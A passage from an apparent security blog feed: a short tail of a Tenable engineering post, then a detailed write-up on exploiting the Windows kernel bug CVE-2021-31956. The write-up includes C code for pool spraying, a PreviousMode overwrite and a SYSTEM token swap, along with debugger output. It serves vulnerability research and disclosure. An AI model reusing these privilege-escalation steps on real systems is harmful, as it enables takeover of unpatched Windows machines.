  • Scroll performance improved by 15x, and query latency was reduced by several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the use of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within a separate blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution, the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice this separate vulnerability is not needed for exploitation of CVE-2021-31956.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to read and write a subsequent _WNF_NAME_INSTANCE, we can overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty with this is that low fragmentation heap (LFH) randomisation makes reliably achieving this memory layout harder, and the first iteration of this exploit stayed away from this approach until more research had been performed into improving general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "heap randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and which clean-ups need to occur in order to maintain system stability post-exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which, when added to the 0x10 header and the POOL_HEADER (0x10), also ends up as a 0xC0 chunk).

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, since we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take the approach from the previous article of freeing holes and then reusing them, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow, and make sure that only the POOL_HEADER and the first 0x10 bytes of the following fields are overflowed.

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeStamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
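
A minimal sketch of this detection loop follows, assuming hypothetical helpers from the spray stage (StateNames holding the sprayed state names, SPRAY_COUNT their number, and buffer a scratch buffer); NtQueryWnfStateData’s commonly documented signature takes the state name, type id, explicit scope, and output change stamp, buffer and size:

ULONG corruptedIndex = (ULONG)-1;
BYTE buffer[0x1000];

for (ULONG i = 0; i < SPRAY_COUNT; i++)
{
    ULONG size = sizeof(buffer);
    WNF_CHANGE_STAMP changeStamp = 0;

    // Whether the call succeeds or reports the buffer as too small, 'size'
    // is updated to the DataSize of the queried instance. A legitimate
    // sprayed _WNF_STATE_DATA is bounded by its 0xA0-byte allocation, so a
    // larger reported size means this is our corrupted, unbounded instance.
    NtQueryWnfStateData(&StateNames[i], NULL, NULL, &changeStamp, buffer, &size);

    if (size > 0xA0)
    {
        corruptedIndex = i;
        break;
    }
}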

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally the chunk containing our unbounded _WNF_STATE_DATA can be allocated within the final block of the pool segment. This means that an unmapped memory read will occur off the end of the page when querying with NtQueryWnfStateData. This rarely happens in practice, and increasing the spray size reduces the likelihood of it occurring (see the Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. From practical testing, performing a large spray before triggering the overflow means this rarely happens within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1) remediated and 2) and 3) occurring only very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above and within the first blog post, we can use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData and ScopeInstance members can be disclosed from the identified target object.
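
As a sketch, assuming data and dataSize are hypothetical values describing the byte buffer returned by querying our unbounded _WNF_STATE_DATA, the scan might look like:

// Scan the relative-read window for the header of an adjacent
// _WNF_NAME_INSTANCE: NodeTypeCode 0x0903 followed by size 0xA8,
// i.e. the byte pattern \x03\x09\xa8.
for (ULONG off = 0; off + 0xA0 <= dataSize; off++)
{
    if (data[off] == 0x03 && data[off + 1] == 0x09 && data[off + 2] == 0xA8)
    {
        // Offsets taken from the _WNF_NAME_INSTANCE layout shown earlier.
        QWORD StateName      = *(QWORD*)(data + off + 0x28);
        QWORD ScopeInstance  = *(QWORD*)(data + off + 0x30);
        QWORD StateData      = *(QWORD*)(data + off + 0x58);
        QWORD CreatorProcess = *(QWORD*)(data + off + 0x98);
        break;
    }
}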

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize and DataSize fields preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory we wished to write to.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of the NtReadVirtualMemory and NtWriteVirtualMemory APIs to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used in order to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer, which deals with general OS policy and operations. The kernel subsystem handles architecture-specific details for low-level operations, and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layers" within kernel memory as _EPROCESS/_KPROCESS and _ETHREAD/_KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is 0 (KernelMode) when the call is made from a user-mode thread, the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see that we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the _KTHREAD kernel data structure which is associated with our running exploit thread.


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just prior to the _KPROCESS ThreadListHead Flink, we can leak out the Flink value by confusing it with the DataSize and the ChangeStamp; after querying the object, we can calculate it as FLINK = ((uintptr_t)ChangeStamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
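
Expressed in code, with DataSize and ChangeStamp being the values returned when querying the re-pointed state name:

// The leaked Flink overlaps DataSize (low 32 bits) and ChangeStamp
// (high 32 bits); 0x2F8 is the ThreadListEntry offset within _KTHREAD.
uintptr_t Flink   = ((uintptr_t)ChangeStamp << 32) | DataSize;
uintptr_t Kthread = Flink - 0x2F8;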

Once we have the address of the _KTHREAD, we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffff900f
   +0x008 DataSize         : 3
   +0x00c ChangeStamp      : 0

This allows the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can influence the value used for DataSize using SetProcessAffinityMask or by launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3-byte read (and up to 0xffff900f bytes write if needed, though we only need 3 bytes), which includes the PreviousMode (i.e. set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer, which is always a kernel-mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, we have an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates the value of moving from an awkward-to-use arbitrary read/write to one which enables easier post-exploitation and enhanced clean-up options.

It is then trivial to walk the ActiveProcessLinks within the _EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this, or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token, using techniques which have long been used by Windows exploits.
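
As an illustrative sketch using the same read64/write64 helpers shown later in this post, the token swap might look as follows; note that the _EPROCESS offsets are the ones for the tested 20H2 build and are assumptions which must be verified against the target:

#define OFF_UNIQUEPROCESSID    0x440 // _EPROCESS.UniqueProcessId (20H2)
#define OFF_ACTIVEPROCESSLINKS 0x448 // _EPROCESS.ActiveProcessLinks (20H2)
#define OFF_TOKEN              0x4b8 // _EPROCESS.Token (20H2)

void StealSystemToken(char* ownEprocess)
{
    char* entry = ownEprocess + OFF_ACTIVEPROCESSLINKS;

    for (;;)
    {
        // Flink points at the next process's ActiveProcessLinks entry.
        entry = (char*)read64(entry);
        char* eprocess = entry - OFF_ACTIVEPROCESSLINKS;

        // PID 4 is the System process.
        if ((QWORD)read64(eprocess + OFF_UNIQUEPROCESSID) == 4)
        {
            QWORD token = (QWORD)read64(eprocess + OFF_TOKEN);
            write64(ownEprocess + OFF_TOKEN, token);
            return;
        }
    }
}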

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit, but due to the potentially large number of memory writes needing to occur for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers, but is often the most challenging part of use in real-world scenarios (red teams, simulated attacks etc.) where stability and reliability are important. Going through this process also helps in understanding how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM whilst PreviousMode is still set to 0, then we end up with the following crash:

Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory primitive to restore the PreviousMode value to 1 before launching the cmd.exe shell.
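
As a sketch, with Kthread being the address derived earlier:

// Restore PreviousMode (offset 0x232 within _KTHREAD on this build) back
// to UserMode (1) using the unconstrained write gained earlier.
BYTE userMode = 1;
NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)(Kthread + 0x232),
                     &userMode, sizeof(userMode), NULL);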

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, also an arbitrary free). If this is not restored to its original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

